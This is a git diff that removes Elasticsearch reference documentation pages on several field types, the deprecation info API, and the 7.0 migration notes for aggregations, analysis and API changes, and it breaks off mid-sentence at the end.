b/docs/reference/mapping/types/token-count.asciidoc deleted file mode 100644 index 31ed2ba0e44..00000000000 --- a/docs/reference/mapping/types/token-count.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[token-count]] -=== Token count field type -++++ -Token count -++++ - -A field of type `token_count` is really an <> field which -accepts string values, analyzes them, then indexes the number of tokens in the -string. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "name": { <1> - "type": "text", - "fields": { - "length": { <2> - "type": "token_count", - "analyzer": "standard" - } - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "name": "John Smith" } - -PUT my-index-000001/_doc/2 -{ "name": "Rachel Alice Williams" } - -GET my-index-000001/_search -{ - "query": { - "term": { - "name.length": 3 <3> - } - } -} --------------------------------------------------- - -<1> The `name` field is a <> field which uses the default -`standard` analyzer. -<2> The `name.length` field is a `token_count` <> which will index the number of tokens in the `name` field. -<3> This query matches only the document containing `Rachel Alice Williams`, as it contains three tokens. - - -[[token-count-params]] -==== Parameters for `token_count` fields - -The following parameters are accepted by `token_count` fields: - -[horizontal] - -<>:: - - The <> which should be used to analyze the string - value. Required. For best performance, use an analyzer without token - filters. - -`enable_position_increments`:: - -Indicates if position increments should be counted. -Set to `false` if you don't want to count tokens removed by analyzer filters (like <>). -Defaults to `true`. - -<>:: - - Mapping field-level query time boosting. 
Accepts a floating point number, defaults - to `1.0`. - -<>:: - - Should the field be stored on disk in a column-stride fashion, so that it - can later be used for sorting, aggregations, or scripting? Accepts `true` - (default) or `false`. - -<>:: - - Should the field be searchable? Accepts `true` (default) and `false`. - -<>:: - - Accepts a numeric value of the same `type` as the field which is - substituted for any explicit `null` values. Defaults to `null`, which - means the field is treated as missing. - -<>:: - - Whether the field value should be stored and retrievable separately from - the <> field. Accepts `true` or `false` - (default). diff --git a/docs/reference/mapping/types/unsigned_long.asciidoc b/docs/reference/mapping/types/unsigned_long.asciidoc deleted file mode 100644 index 6e7ace01b63..00000000000 --- a/docs/reference/mapping/types/unsigned_long.asciidoc +++ /dev/null @@ -1,127 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[unsigned-long]] -=== Unsigned long field type -++++ -Unsigned long -++++ -Unsigned long is a numeric field type that represents an unsigned 64-bit -integer with a minimum value of 0 and a maximum value of +2^64^-1+ -(from 0 to 18446744073709551615 inclusive). - -[source,console] --------------------------------------------------- -PUT my_index -{ - "mappings": { - "properties": { - "my_counter": { - "type": "unsigned_long" - } - } - } -} --------------------------------------------------- - -Unsigned long can be indexed in a numeric or string form, -representing integer values in the range [0, 18446744073709551615]. -They can't have a decimal part. - -[source,console] --------------------------------- -POST /my_index/_bulk?refresh -{"index":{"_id":1}} -{"my_counter": 0} -{"index":{"_id":2}} -{"my_counter": 9223372036854775808} -{"index":{"_id":3}} -{"my_counter": 18446744073709551614} -{"index":{"_id":4}} -{"my_counter": 18446744073709551615} --------------------------------- -//TEST[continued] - -Term queries accept any numbers in a numeric or string form. - -[source,console] --------------------------------- -GET /my_index/_search -{ - "query": { - "term" : { - "my_counter" : 18446744073709551615 - } - } -} --------------------------------- -//TEST[continued] - -Range query terms can contain values with decimal parts. -In this case {es} converts them to integer values: -`gte` and `gt` terms are converted to the nearest integer up inclusive, -and `lt` and `lte` ranges are converted to the nearest integer down inclusive. - -It is recommended to pass ranges as strings to ensure they are parsed -without any loss of precision. - -[source,console] --------------------------------- -GET /my_index/_search -{ - "query": { - "range" : { - "my_counter" : { - "gte" : "9223372036854775808.5", - "lte" : "18446744073709551615" - } - } - } -} --------------------------------- -//TEST[continued] - - -For queries with sort on an `unsigned_long` field, -for a particular document {es} returns a sort value of the type `long` -if the value of this document is within the range of long values, -or of the type `BigInteger` if the value exceeds this range. - -NOTE: REST clients need to be able to handle big integer values -in JSON to support this field type correctly. - -[source,console] --------------------------------- -GET /my_index/_search -{ - "query": { - "match_all" : {} - }, - "sort" : {"my_counter" : "desc"} -} --------------------------------- -//TEST[continued] - - -==== Unsigned long in scripts -Currently unsigned_long is not supported in scripts. 
- -==== Stored fields -A stored field of `unsigned_long` is stored and returned as `String`. - -==== Aggregations -For `terms` aggregations, similarly to sort values, `Long` or -`BigInteger` values are used. For other aggregations, -values are converted to the `double` type. - -==== Queries with mixed numeric types - -Searches with mixed numeric types one of which is `unsigned_long` are -supported, except queries with sort. Thus, a sort query across two indexes -where the same field name has an `unsigned_long` type in one index, -and `long` type in another, doesn't produce correct results and must -be avoided. If there is a need for such kind of sorting, script based sorting -can be used instead. - -Aggregations across several numeric types one of which is `unsigned_long` are -supported. In this case, values are converted to the `double` type. diff --git a/docs/reference/mapping/types/version.asciidoc b/docs/reference/mapping/types/version.asciidoc deleted file mode 100644 index a1dfc693955..00000000000 --- a/docs/reference/mapping/types/version.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[version]] -=== Version field type -++++ -Version -++++ - -The `version` field type is a specialization of the `keyword` field for -handling software version values and to support specialized precedence -rules for them. Precedence is defined following the rules outlined by -https://semver.org/[Semantic Versioning], which for example means that -major, minor and patch version parts are sorted numerically (i.e. -"2.1.0" < "2.4.1" < "2.11.2") and pre-release versions are sorted before -release versions (i.e. "1.0.0-alpha" < "1.0.0"). - -You index a `version` field as follows - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_version": { - "type": "version" - } - } - } -} - --------------------------------------------------- - -The field offers the same search capabilities as a regular keyword field. It -can e.g. be searched for exact matches using `match` or `term` queries and -supports prefix and wildcard searches. The main benefit is that `range` queries -will honor Semver ordering, so a `range` query between "1.0.0" and "1.5.0" -will include versions of "1.2.3" but not "1.11.2" for example. Note that this -would be different when using a regular `keyword` field for indexing where ordering -is alphabetical. - -Software versions are expected to follow the -https://semver.org/[Semantic Versioning rules] schema and precedence rules with -the notable exception that more or less than three main version identifiers are -allowed (i.e. "1.2" or "1.2.3.4" qualify as valid versions while they wouldn't under -strict Semver rules). Version strings that are not valid under the Semver definition -(e.g. "1.2.alpha.4") can still be indexed and retrieved as exact matches, however they -will all appear _after_ any valid version with regular alphabetical ordering. The empty -String "" is considered invalid and sorted after all valid versions, but before other -invalid ones. - -[discrete] -[[version-params]] -==== Parameters for version fields - -The following parameters are accepted by `version` fields: - -[horizontal] - -<>:: - - Metadata about the field. - -[discrete] -==== Limitations - -This field type isn't optimized for heavy wildcard, regex or fuzzy searches. 
While those -type of queries work in this field, you should consider using a regular `keyword` field if -you strongly rely on these kind of queries. - diff --git a/docs/reference/mapping/types/wildcard.asciidoc b/docs/reference/mapping/types/wildcard.asciidoc deleted file mode 100644 index 7f27cd80ea3..00000000000 --- a/docs/reference/mapping/types/wildcard.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[discrete] -[[wildcard-field-type]] -=== Wildcard field type - -A `wildcard` field stores values optimised for wildcard grep-like queries. -Wildcard queries are possible on other field types but suffer from constraints: - -* `text` fields limit matching of any wildcard expressions to individual tokens rather than the original whole value held in a field -* `keyword` fields are untokenized but slow at performing wildcard queries (especially patterns with leading wildcards). - -Internally the `wildcard` field indexes the whole field value using ngrams and stores the full string. -The index is used as a rough filter to cut down the number of values that are then checked by retrieving and checking the full values. -This field is especially well suited to run grep-like queries on log lines. Storage costs are typically lower than those of `keyword` -fields but search speeds for exact matches on full terms are slower. - -You index and search a wildcard field as follows - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "my_wildcard": { - "type": "wildcard" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "my_wildcard" : "This string can be quite lengthy" -} - -GET my-index-000001/_search -{ - "query": { - "wildcard": { - "my_wildcard": { - "value": "*quite*lengthy" - } - } - } -} - - --------------------------------------------------- - - -[discrete] -[[wildcard-params]] -==== Parameters for wildcard fields - -The following parameters are accepted by `wildcard` fields: - -[horizontal] - -<>:: - - Accepts a string value which is substituted for any explicit `null` - values. Defaults to `null`, which means the field is treated as missing. - -<>:: - - Do not index any string longer than this value. Defaults to `2147483647` - so that all values would be accepted. - -[discrete] -==== Limitations - -* `wildcard` fields are untokenized like keyword fields, so do not support queries that rely on word positions such as phrase queries. - diff --git a/docs/reference/migration/apis/deprecation.asciidoc b/docs/reference/migration/apis/deprecation.asciidoc deleted file mode 100644 index 2cc954d3c2b..00000000000 --- a/docs/reference/migration/apis/deprecation.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[migration-api-deprecation]] -=== Deprecation info APIs -++++ -Deprecation info -++++ - -IMPORTANT: Use this API to check for deprecated configuration before performing -a major version upgrade. You should run it on the last minor version of the -major version you are upgrading from, as earlier minor versions may not include -all deprecations. - -The deprecation API is to be used to retrieve information about different -cluster, node, and index level settings that use deprecated features that will -be removed or changed in the next major version. 
- -[[migration-api-request]] -==== {api-request-title} - -`GET /_migration/deprecations` + - -`GET //_migration/deprecations` - -[[migration-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separate list of data streams or indices to check. Wildcard (`*`) -expressions are supported. -+ -When you specify this parameter, only deprecations for the specified -data streams or indices are returned. - -[[migration-api-example]] -==== {api-examples-title} - -To see the list of offenders in your cluster, submit a GET request to the -`_migration/deprecations` endpoint: - -[source,console] --------------------------------------------------- -GET /_migration/deprecations --------------------------------------------------- -// TEST[skip:cannot assert tests have certain deprecations] - -Example response: - - -["source","js",subs="attributes,callouts,macros"] --------------------------------------------------- -{ - "cluster_settings" : [ - { - "level" : "critical", - "message" : "Cluster name cannot contain ':'", - "url" : "{ref}/breaking-changes-7.0.html#_literal_literal_is_no_longer_allowed_in_cluster_name", - "details" : "This cluster is named [mycompany:logging], which contains the illegal character ':'." - } - ], - "node_settings" : [ ], - "index_settings" : { - "logs:apache" : [ - { - "level" : "warning", - "message" : "Index name cannot contain ':'", - "url" : "{ref}/breaking-changes-7.0.html#_literal_literal_is_no_longer_allowed_in_index_name", - "details" : "This index is named [logs:apache], which contains the illegal character ':'." - } - ] - }, - "ml_settings" : [ ] -} --------------------------------------------------- -// NOTCONSOLE - -The response breaks down all the specific forward-incompatible settings that you -should resolve before upgrading your cluster. Any offending settings are -represented as a deprecation warning. - -The following is an example deprecation warning: - -["source","js",subs="attributes,callouts,macros"] --------------------------------------------------- -{ - "level" : "warning", - "message" : "This is the generic descriptive message of the breaking change", - "url" : "{ref-60}/breaking_60_indices_changes.html", - "details" : "more information, like which nodes, indices, or settings are to blame" -} --------------------------------------------------- -// NOTCONSOLE - -As is shown, there is a `level` property that describes the significance of the -issue. - -|======= -|warning | You can upgrade directly, but you are using deprecated functionality -which will not be available or behave differently in the next major version. -|critical | You cannot upgrade without fixing this problem. -|======= - -The `message` property and the optional `details` property provide descriptive -information about the deprecation warning. The `url` property provides a link to -the Breaking Changes Documentation, where you can find more information about -this change. - -Any cluster-level deprecation warnings can be found under the `cluster_settings` -key. Similarly, any node-level warnings are found under `node_settings`. Since -only a select subset of your nodes might incorporate these settings, it is -important to read the `details` section for more information about which nodes -are affected. Index warnings are sectioned off per index and can be filtered -using an index-pattern in the query. This section includes warnings for the -backing indices of data streams specified in the request path. 
Machine Learning -related deprecation warnings can be found under the `ml_settings` key. - -The following example request shows only index-level deprecations of all -`logstash-*` indices: - -[source,console] --------------------------------------------------- -GET /logstash-*/_migration/deprecations --------------------------------------------------- -// TEST[skip:cannot assert tests have certain deprecations] diff --git a/docs/reference/migration/index.asciidoc b/docs/reference/migration/index.asciidoc deleted file mode 100644 index b51a22e7ccc..00000000000 --- a/docs/reference/migration/index.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[breaking-changes]] -= Migration guide - -[partintro] --- -This section describes the breaking changes and deprecations introduced in this release -and previous minor versions. - -As {es} introduces new features and improves existing ones, -the changes sometimes make older settings, APIs, and parameters obsolete. -The obsolete functionality is typically deprecated in a minor release and -removed in the subsequent major release. -This enables applications to continue working unchanged across most minor version upgrades. -Breaking changes introduced in minor releases are generally limited to critical security fixes -and bug fixes that correct unintended behavior. - -To get the most out of {es} and facilitate future upgrades, we strongly encourage migrating -away from using deprecated functionality as soon as possible. - -To give you insight into what deprecated features you're using, {es}: - -- Returns a `Warn` HTTP header whenever you submit a request that uses deprecated functionality. -- <> when deprecated functionality is used. -- <> that scans a cluster's configuration -and mappings for deprecated functionality. - -For more information about {minor-version}, -see the <> and <>. -For information about how to upgrade your cluster, see <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::migrate_7_10.asciidoc[] -include::migrate_7_9.asciidoc[] -include::migrate_7_8.asciidoc[] -include::migrate_7_7.asciidoc[] -include::migrate_7_6.asciidoc[] -include::migrate_7_5.asciidoc[] -include::migrate_7_4.asciidoc[] -include::migrate_7_3.asciidoc[] -include::migrate_7_2.asciidoc[] -include::migrate_7_1.asciidoc[] -include::migrate_7_0.asciidoc[] diff --git a/docs/reference/migration/migrate_7_0.asciidoc b/docs/reference/migration/migrate_7_0.asciidoc deleted file mode 100644 index 141e359afa6..00000000000 --- a/docs/reference/migration/migrate_7_0.asciidoc +++ /dev/null @@ -1,72 +0,0 @@ -[[breaking-changes-7.0]] -== Breaking changes in 7.0 -++++ -7.0 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.0. - -See also <> and <>. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -=== Indices created before 7.0 - -Elasticsearch 7.0 can read indices created in version 6.0 or above. An -Elasticsearch 7.0 node will not start in the presence of indices created in a -version of Elasticsearch before 6.0. - -[IMPORTANT] -.Reindex indices from Elasticsearch 5.x or before -========================================= - -Indices created in Elasticsearch 5.x or before will need to be reindexed with -Elasticsearch 6.x in order to be readable by Elasticsearch 7.x. 
- -========================================= - -include::migrate_7_0/aggregations.asciidoc[] -include::migrate_7_0/analysis.asciidoc[] -include::migrate_7_0/cluster.asciidoc[] -include::migrate_7_0/discovery.asciidoc[] -include::migrate_7_0/ingest.asciidoc[] -include::migrate_7_0/indices.asciidoc[] -include::migrate_7_0/mappings.asciidoc[] -include::migrate_7_0/ml.asciidoc[] -include::migrate_7_0/search.asciidoc[] -include::migrate_7_0/suggesters.asciidoc[] -include::migrate_7_0/packaging.asciidoc[] -include::migrate_7_0/plugins.asciidoc[] -include::migrate_7_0/api.asciidoc[] -include::migrate_7_0/java.asciidoc[] -include::migrate_7_0/settings.asciidoc[] -include::migrate_7_0/scripting.asciidoc[] -include::migrate_7_0/snapshotstats.asciidoc[] -include::migrate_7_0/restclient.asciidoc[] -include::migrate_7_0/low_level_restclient.asciidoc[] -include::migrate_7_0/logging.asciidoc[] -include::migrate_7_0/node.asciidoc[] -include::migrate_7_0/java_time.asciidoc[] diff --git a/docs/reference/migration/migrate_7_0/aggregations.asciidoc b/docs/reference/migration/migrate_7_0/aggregations.asciidoc deleted file mode 100644 index f0e7a78302a..00000000000 --- a/docs/reference/migration/migrate_7_0/aggregations.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[discrete] -[[breaking_70_aggregations_changes]] -=== Aggregations changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - - -[discrete] -[[removed-global-ordinals-hash-and-global-ordinals-low-cardinality-terms-agg]] -==== Deprecated `global_ordinals_hash` and `global_ordinals_low_cardinality` execution hints for terms aggregations have been removed - -These `execution_hint` are removed and should be replaced by `global_ordinals`. - -[discrete] -[[search-max-buckets-cluster-setting]] -==== `search.max_buckets` in the cluster setting - -The dynamic cluster setting named `search.max_buckets` now defaults -to 10,000 (instead of unlimited in the previous version). -Requests that try to return more than the limit will fail with an exception. - -[discrete] -[[missing-option-removed-composite-agg]] -==== `missing` option of the `composite` aggregation has been removed - -The `missing` option of the `composite` aggregation, deprecated in 6.x, -has been removed. `missing_bucket` should be used instead. - -[discrete] -[[replace-params-agg-with-state-context-variable]] -==== Replaced `params._agg` with `state` context variable in scripted metric aggregations - -The object used to share aggregation state between the scripts in a Scripted Metric -Aggregation is now a variable called `state` available in the script context, rather than -being provided via the `params` object as `params._agg`. - -[discrete] -[[reduce-script-combine-script-params-mandatory]] -==== Make metric aggregation script parameters `reduce_script` and `combine_script` mandatory - -The metric aggregation has been changed to require these two script parameters to ensure users are -explicitly defining how their data is processed. - -[discrete] -[[percentiles-percentile-ranks-return-null-instead-nan]] -==== `percentiles` and `percentile_ranks` now return `null` instead of `NaN` - -The `percentiles` and `percentile_ranks` aggregations used to return `NaN` in -the response if they were applied to an empty set of values. Because `NaN` is -not officially supported by JSON, it has been replaced with `null`. 
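For example, a `percentiles` aggregation over a field with no values (the index and field names below are made up) now produces `null` entries in the `values` object rather than `NaN`, so the response remains valid JSON:

[source,console]
--------------------------------------------------
GET /my-index-000001/_search
{
  "size": 0,
  "aggs": {
    "load_time_outliers": {
      "percentiles": {
        "field": "load_time"
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:illustrative sketch only]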
- -[discrete] -[[stats-extended-stats-return-zero-instead-null]] -==== `stats` and `extended_stats` now return 0 instead of `null` for zero docs - -When the `stats` and `extended_stats` aggregations collected zero docs (`doc_count: 0`), -their value would be `null`. This was in contrast with the `sum` aggregation which -would return `0`. The `stats` and `extended_stats` aggs are now consistent with -`sum` and also return zero. diff --git a/docs/reference/migration/migrate_7_0/analysis.asciidoc b/docs/reference/migration/migrate_7_0/analysis.asciidoc deleted file mode 100644 index 7c5e4901b6e..00000000000 --- a/docs/reference/migration/migrate_7_0/analysis.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[discrete] -[[breaking_70_analysis_changes]] -=== Analysis changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[limit-number-of-tokens-produced-by-analyze]] -==== Limiting the number of tokens produced by _analyze - -To safeguard against out of memory errors, the number of tokens that can be produced -using the `_analyze` endpoint has been limited to 10000. This default limit can be changed -for a particular index with the index setting `index.analyze.max_token_count`. - -[discrete] -==== Limiting the length of an analyzed text during highlighting - -Highlighting a text that was indexed without offsets or term vectors, -requires analysis of this text in memory real time during the search request. -For large texts this analysis may take substantial amount of time and memory. -To protect against this, the maximum number of characters that will be analyzed has been -limited to 1000000. This default limit can be changed -for a particular index with the index setting `index.highlight.max_analyzed_offset`. - -[discrete] -[[delimited-payload-filter-renaming]] -==== `delimited_payload_filter` renaming - -The `delimited_payload_filter` was deprecated and renamed to `delimited_payload` in 6.2. -Using it in indices created before 7.0 will issue deprecation warnings. Using the old -name in new indices created in 7.0 will throw an error. Use the new name `delimited_payload` -instead. - -[discrete] -[[standard-filter-removed]] -==== `standard` filter has been removed - -The `standard` token filter has been removed because it doesn't change anything in the stream. - -[discrete] -==== Deprecated standard_html_strip analyzer - -The `standard_html_strip` analyzer has been deprecated, and should be replaced -with a combination of the `standard` tokenizer and `html_strip` char_filter. -Indexes created using this analyzer will still be readable in elasticsearch 7.0, -but it will not be possible to create new indexes using it. - -[discrete] -[[deprecated-ngram-edgengram-token-filter-cannot-be-used]] -==== The deprecated `nGram` and `edgeNGram` token filter cannot be used on new indices - -The `nGram` and `edgeNGram` token filter names have been deprecated in an earlier 6.x version. -Indexes created using these token filters will still be readable in elasticsearch 7.0 but indexing -documents using those filter names will issue a deprecation warning. Using the deprecated names on -new indices starting with version 7.0.0 will be prohibited and throw an error when indexing -or analyzing documents. Both names should be replaced by `ngram` or `edge_ngram` respectively. 
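For example, a custom analyzer that previously referenced the deprecated `nGram` filter name can be declared with the new `ngram` name instead (the index, filter, and analyzer names below are made up):

[source,console]
--------------------------------------------------
PUT /my-index-000001
{
  "settings": {
    "analysis": {
      "filter": {
        "my_trigrams": {
          "type": "ngram",
          "min_gram": 3,
          "max_gram": 4
        }
      },
      "analyzer": {
        "my_trigram_analyzer": {
          "type": "custom",
          "tokenizer": "standard",
          "filter": [ "lowercase", "my_trigrams" ]
        }
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:illustrative sketch only]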
- -[discrete] -==== Limit to the difference between max_size and min_size in NGramTokenFilter and NGramTokenizer - -To safeguard against creating too many index terms, the difference between `max_ngram` and -`min_ngram` in `NGramTokenFilter` and `NGramTokenizer` has been limited to 1. This default -limit can be changed with the index setting `index.max_ngram_diff`. Note that if the limit is -exceeded a error is thrown only for new indices. For existing pre-7.0 indices, a deprecation -warning is logged. - -[discrete] -==== Limit to the difference between max_shingle_size and min_shingle_size in ShingleTokenFilter - -To safeguard against creating too many tokens, the difference between `max_shingle_size` and -`min_shingle_size` in `ShingleTokenFilter` has been limited to 3. This default -limit can be changed with the index setting `index.max_shingle_diff`. Note that if the limit is -exceeded a error is thrown only for new indices. For existing pre-7.0 indices, a deprecation -warning is logged. diff --git a/docs/reference/migration/migrate_7_0/api.asciidoc b/docs/reference/migration/migrate_7_0/api.asciidoc deleted file mode 100644 index d110f7882c1..00000000000 --- a/docs/reference/migration/migrate_7_0/api.asciidoc +++ /dev/null @@ -1,303 +0,0 @@ -[discrete] -[[breaking_70_api_changes]] -=== API changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - - -[discrete] -==== Internal Versioning is no longer supported for optimistic concurrency control - -Elasticsearch maintains a numeric version field for each document it stores. That field -is incremented by one with every change to the document. Until 7.0.0 the API allowed using -that field for optimistic concurrency control, i.e., making a write operation conditional -on the current document version. Sadly, that approach is flawed because the value of the -version doesn't always uniquely represent a change to the document. If a primary fails -while handling a write operation, it may expose a version that will then be reused by the -new primary. - -Due to that issue, internal versioning can no longer be used and is replaced by a new -method based on <>. To switch -to the new method, follow these steps: - -. Perform a <> to 6.8. - -. <> any indices created before 6.0. This ensures -documents in those indices have sequence numbers. -+ -To get the {es} version in which an index was created, use the -<> with the `human` parameter: -+ --- -.*API Example* -[%collapsible] -==== -[source,console] ----- -GET /*?human ----- -// TEST[setup:my_index] - -The response returns a `settings.index.version.created_string` property for -each index: - -[source,console-response] ----- -{ - "my-index-000001": { - ... 
- "settings": { - "index": { - "creation_date_string": "2099-01-01T00:00:00.000Z", - "routing": { - "allocation": { - "include": { - "_tier_preference": "data_content" - } - } - }, - "number_of_shards": "1", - "provided_name": "my-index-000001", - "creation_date": "4070908800", - "number_of_replicas": "1", - "uuid": "c89-MHh8RwKwS1r7Turg2g", - "version": { - "created_string": "5.5.0", <1> - "created": "5050099" - } - } - } - } -} ----- -// TESTRESPONSE[s/\.\.\./"aliases": $body.my-index-000001.aliases, "mappings": $body.my-index-000001.mappings,/] -// TESTRESPONSE[s/"creation_date_string": "2099-01-01T00:00:00.000Z"/"creation_date_string": $body.my-index-000001.settings.index.creation_date_string/] -// TESTRESPONSE[s/"creation_date": "4070908800"/"creation_date": $body.my-index-000001.settings.index.creation_date/] -// TESTRESPONSE[s/"uuid": "c89-MHh8RwKwS1r7Turg2g"/"uuid": $body.my-index-000001.settings.index.uuid/] -// TESTRESPONSE[s/"created_string": "5.5.0"/"created_string": $body.my-index-000001.settings.index.version.created_string/] -// TESTRESPONSE[s/"created": "5050099"/"created": $body.my-index-000001.settings.index.version.created/] - -<1> This index was created in {es} 5.5.0. -==== --- - -. Update your application or workflow to use -<> for concurrency control. - -. Perform a rolling upgrade to {version}. - -NOTE: The `external` versioning type is still fully supported. - -[discrete] -==== Camel case and underscore parameters deprecated in 6.x have been removed -A number of duplicate parameters deprecated in 6.x have been removed from -Bulk request, Multi Get request, Term Vectors request, and More Like This Query -requests. - -The following camel case parameters have been removed: - -* `opType` -* `versionType`, `_versionType` - -The following parameters starting with underscore have been removed: - -* `_parent` -* `_retry_on_conflict` -* `_routing` -* `_version` -* `_version_type` - -Instead of these removed parameters, use their non camel case equivalents without -starting underscore, e.g. use `version_type` instead of `_version_type` or `versionType`. - -[discrete] -==== Thread pool info - -In previous versions of Elasticsearch, the thread pool info returned in the -<> returned `min` and `max` values reflecting -the configured minimum and maximum number of threads that could be in each -thread pool. The trouble with this representation is that it does not align with -the configuration parameters used to configure thread pools. For -<>, the minimum number of threads is -configured by a parameter called `core` and the maximum number of threads is -configured by a parameter called `max`. For <>, there is only one configuration parameter along these lines and that -parameter is called `size`, reflecting the fixed number of threads in the -pool. This discrepancy between the API and the configuration parameters has been -rectified. Now, the API will report `core` and `max` for scaling thread pools, -and `size` for fixed thread pools. - -Similarly, in the cat thread pool API the existing `size` output has been -renamed to `pool_size` which reflects the number of threads currently in the -pool; the shortcut for this value has been changed from `s` to `psz`. The `min` -output has been renamed to `core` with a shortcut of `cr`, the shortcut for -`max` has been changed to `mx`, and the `size` output with a shortcut of `sz` -has been reused to report the configured number of threads in the pool. This -aligns the output of the API with the configuration values for thread -pools. 
Note that `core` and `max` will be populated for scaling thread pools, -and `size` will be populated for fixed thread pools. - -[discrete] -[[fields-param-removed-bulk-update-request]] -==== The parameter `fields` deprecated in 6.x has been removed from Bulk request -and Update request. The Update API returns `400 - Bad request` if request contains -unknown parameters (instead of ignored in the previous version). - -[discrete] -==== PUT Document with Version error message changed when document is missing - -If you attempt to `PUT` a document with versioning (e.g. `PUT /test/_doc/1?version=4`) -but the document does not exist, a cryptic message is returned: - -[source,text] ----------- -version conflict, current version [-1] is different than the one provided [4] ----------- - -Now if the document is missing a more helpful message is returned: - -[source,text] ----------- -document does not exist (expected version [4]) ----------- - -Although exceptions messages are liable to change and not generally subject to -backwards compatibility, the nature of this message might mean clients are relying -on parsing the version numbers and so the format change might impact some users. - -[discrete] -[[remove-suggest-metric]] -==== Remove support for `suggest` metric/index metric in indices stats and nodes stats APIs - -Previously, `suggest` stats were folded into `search` stats. Support for the -`suggest` metric on the indices stats and nodes stats APIs remained for -backwards compatibility. Backwards support for the `suggest` metric was -deprecated in 6.3.0 and now removed in 7.0.0. - -[discrete] -[[remove-field-caps-body]] -==== Field capabilities request format - -In the past, `fields` could be provided either as a parameter, or as part of the request -body. Specifying `fields` in the request body as opposed to a parameter was deprecated -in 6.4.0, and is now unsupported in 7.0.0. - -[discrete] -[[copy-settings-deprecated-shrink-split-apis]] -==== `copy_settings` is deprecated on shrink and split APIs - -Versions of Elasticsearch prior to 6.4.0 did not copy index settings on shrink -and split operations. Starting with Elasticsearch 7.0.0, the default behavior -will be for such settings to be copied on such operations. To enable users in -6.4.0 to transition in 6.4.0 to the default behavior in 7.0.0, the -`copy_settings` parameter was added on the REST layer. As this behavior will be -the only behavior in 8.0.0, this parameter is deprecated in 7.0.0 for removal in -8.0.0. - -[discrete] -==== The deprecated stored script contexts have now been removed -When putting stored scripts, support for storing them with the deprecated `template` context or without a context is -now removed. Scripts must be stored using the `script` context as mentioned in the documentation. - -[discrete] -==== Removed Get Aliases API limitations when {security-features} are enabled - -The behavior and response codes of the get aliases API no longer vary -depending on whether {security-features} are enabled. Previously a -404 - NOT FOUND (IndexNotFoundException) could be returned in case the -current user was not authorized for any alias. An empty response with -status 200 - OK is now returned instead at all times. - -[discrete] -[[user-object-removed-put-user-api]] -==== Put User API response no longer has `user` object - -The Put User API response was changed in 6.5.0 to add the `created` field -outside of the user object where it previously had been. 
In 7.0.0 the user -object has been removed in favor of the top level `created` field. - -[discrete] -[[source-include-exclude-params-removed]] -==== Source filtering url parameters `_source_include` and `_source_exclude` have been removed - -The deprecated in 6.x url parameters are now removed. Use `_source_includes` and `_source_excludes` instead. - -[discrete] -==== Multi Search Request metadata validation - -MultiSearchRequests issued through `_msearch` now validate all keys in the metadata section. Previously unknown keys were ignored -while now an exception is thrown. - -[discrete] -==== Deprecated graph endpoints removed - -The deprecated graph endpoints (those with `/_graph/_explore`) have been -removed. - - -[discrete] -[[deprecated-termvector-endpoint-removed]] -==== Deprecated `_termvector` endpoint removed - -The `_termvector` endpoint was deprecated in 2.0 and has now been removed. -The endpoint `_termvectors` (plural) should be used instead. - -[discrete] -==== When {security-features} are enabled, index monitoring APIs over restricted indices are not authorized implicitly anymore - -Restricted indices (currently only `.security-6` and `.security`) are special internal -indices that require setting the `allow_restricted_indices` flag on every index -permission that covers them. If this flag is `false` (default) the permission -will not cover these and actions against them will not be authorized. -However, the monitoring APIs were the only exception to this rule. This exception -has been forfeited and index monitoring privileges have to be granted explicitly, -using the `allow_restricted_indices` flag on the permission (as any other index -privilege). - -[discrete] -[[remove-get-support-cache-clear-api]] -==== Removed support for `GET` on the `_cache/clear` API - -The `_cache/clear` API no longer supports the `GET` HTTP verb. It must be called -with `POST`. - -[discrete] -==== Cluster state size metrics removed from Cluster State API Response - -The `compressed_size` / `compressed_size_in_bytes` fields were removed from -the Cluster State API response. The calculation of the size was expensive and had -dubious value, so the field was removed from the response. - -[discrete] -==== Migration Assistance API has been removed - -The Migration Assistance API has been functionally replaced by the -Deprecation Info API, and the Migration Upgrade API is not used for the -transition from ES 6.x to 7.x, and does not need to be kept around to -repair indices that were not properly upgraded before upgrading the -cluster, as was the case in 6. - -[discrete] -==== Changes to thread pool naming in Node and Cat APIs -The `thread_pool` information returned from the Nodes and Cat APIs has been -standardized to use the same terminology as the thread pool configurations. -This means the response will align with the configuration instead of being -the same across all the thread pools, regardless of type. - -[discrete] -==== Return 200 when cluster has valid read-only blocks -If the cluster was configured with `no_master_block: write` and lost its master, -it would return a `503` status code from a main request (`GET /`) even though -there are viable read-only nodes available. The cluster now returns 200 status -in this situation. - -[discrete] -==== Clearing indices cache is now POST-only -Clearing the cache indices could previously be done via GET and POST. As GET should -only support read only non state-changing operations, this is no longer allowed. -Only POST can be used to 